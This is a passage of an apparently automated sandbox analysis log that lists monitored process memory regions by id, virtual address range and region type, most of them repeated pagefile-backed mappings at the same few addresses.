"pagefile_0x0000000000610000" filename = "" Region: id = 15802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15835 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15836 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15840 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15841 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15842 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15843 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15844 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15845 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15846 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15847 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15848 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15849 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15850 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15851 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15852 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15853 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15854 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15855 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15856 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15857 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15858 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15859 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15860 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15863 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15864 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15910 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15911 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15912 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15913 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15971 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15972 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15974 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15975 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15978 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15979 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15980 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15981 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15982 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15983 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15984 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15985 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15986 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15987 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15988 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15989 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15990 start_va = 